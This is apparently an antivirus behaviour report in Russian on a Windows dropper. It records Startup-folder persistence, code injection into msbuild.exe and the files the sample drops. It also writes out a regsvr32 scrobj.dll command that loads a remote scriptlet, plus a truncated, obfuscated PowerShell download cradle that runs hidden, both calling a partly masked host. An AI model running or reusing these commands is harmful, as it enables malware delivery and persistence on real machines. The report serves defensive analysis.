Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\appventsubsystemcontroller.url
Вредоносные функции
Загружает и запускает на исполнение
- http://wg###llestig.at/libraries/cms/editor/00/david.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\regsvr32.exe' -s /n /U /I:http://wg###llestig.at/libraries/cms/editor/00/david.sct sCRObJ.Dll
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\davids.exe
- %HOMEPATH%\appventsubsystemcontroller\appventsubsystemcontroller.vbs
- %HOMEPATH%\appventsubsystemcontroller\ktmutil.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://wg###llestig.at/libraries/cms/editor/00/david.sct
- http://wg###llestig.at/libraries/cms/editor/00/david.exe
UDP
- DNS ASK wg###llestig.at
Другое
Создает и запускает на исполнение
- '%APPDATA%\davids.exe'
- '<SYSTEM32>\cmd.exe' "/c PoWErsheLL.exe -EX BYpaSS -nOP -W 1 SeT-conTenT -VA ( new-ObjeCT Net.wEBCLIEnt ...' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' -s /n /U /I:http://wg###llestig.at/libraries/cms/editor/00/david.sct sCRObJ.Dll' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/c PoWErsheLL.exe -EX BYpaSS -nOP -W 1 SeT-conTenT -VA ( new-ObjeCT Net.wEBCLIEnt ...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
